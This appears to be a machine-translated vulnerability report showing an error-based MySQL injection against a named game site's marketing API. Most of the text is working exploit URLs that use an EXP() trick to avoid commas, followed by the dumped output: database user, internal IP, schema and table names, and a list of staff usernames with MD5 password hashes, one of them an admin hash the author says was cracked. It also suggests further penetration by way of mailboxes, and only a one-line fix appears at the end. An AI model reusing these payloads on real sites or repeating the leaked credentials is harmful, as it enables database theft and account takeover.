17173 MySQL error injection at a game site

17173 MySQL error injection at a game site

17173 MySQL injection error reported by a game site

UpdateXML, duplicate entry error injection, must use a comma.

What if the comma is used as a separator or is it filtered out?

You can use the exp function to report an error!

 

http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20user())a))%2b%22bb&t=1425612949962

User: act_admin@10.59.107.127
Further, guess the database:

Http://marketing.17173.com/Api/ShowData? Id = aa % 22% 2 bEXP (~ (Select % 20 * % 20 from % 20 (select % 20group_concat (schema_name) % 20 from % 20INFORMATION_SCHEMA.SCHEMATA) a) % 2b % 22bb & t = 1425612949962
Get:

information_schemaact_autoact_os_2013act_os_2014act_os_2015activity2010activity2011activity2012activity2013activity2014activity2015activity_manage

View the data table in the activity_manage database:

Http://marketing.17173.com/Api/ShowData? Id = aa % 22% 2 bEXP (~ (Select % 20 * % 20 from % 20 (select % 20group_concat (table_name) % 20 from % 20information_schema.tables % 20 where % 20table_schema = % 27activity_manage % 27) )) % 2b % 22bb & t = 1425612949962
Get:

activitiesactivity_classifyactivity_commentactivity_functionactivity_joinactivity_joinrecordactivity_logactivity_rightusers

Then retrieve all columns in the users table:

http://marketing.17173.com/Api/ShowData?id=aa%22%2bEXP(~(select%20*%20from%20(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_name=%27users%27)a))%2b%22bb&t=1425612949962user_idusernamepasswdgroup_idnoteadminid

Then, you can guess username and password to get the admin password f00e61dc5e9caadbb3a57fbd95f5f0bd. The actadmin is cracked! @ # $ % ^

admin      f00e61dc5e9caadbb3a57fbd95f5f0bdLC0391    670b14728ad9902aecba32e22fa4f6bdLC0095    10334eb58085ce713fd970a1461d8e77wuhong   6cdb4956e4eb4d0d8495c6a98eff0f94lc0630     61ec7506bcbaf614f7fec0cbe9b0badaLC0176   c2d542de924e4b22f77da80267632207LC0059   81fa32c3d5abab6076250a9d75354f40LC0068   69cfc91a0131c110096724a22b63f166lc0499    91ce6699aa98b0b8692914f3eb4010baLC0067   93012eeab6bdf052b4e988aa1606da31LC0561   670b14728ad9902aecba32e22fa4f6bdLC0805   3d822f2886a31d2a0b5a7929c67c87ffLC0921   63998412bb2c639038ebc2fb4f246873LC0031   84e40b55f1e936075b2afc18c27d8fd8

Because the error message limits the length of the text and the retrieval is incomplete at a time, you need to use the limit 10 offset 10 format to partition and output 10 rows, the above is only part of the content. Comma is not required, for example:

Select group_concat (passwd) from activity_manage.users limit 10 offset 0)
So far, we can obtain all the content in the database. We can search for the content to enter the background, and use the mailbox for subsequent penetration such as cracking.
Vulnerability repair suggestions:
Filter and escape parameters, especially double quotation marks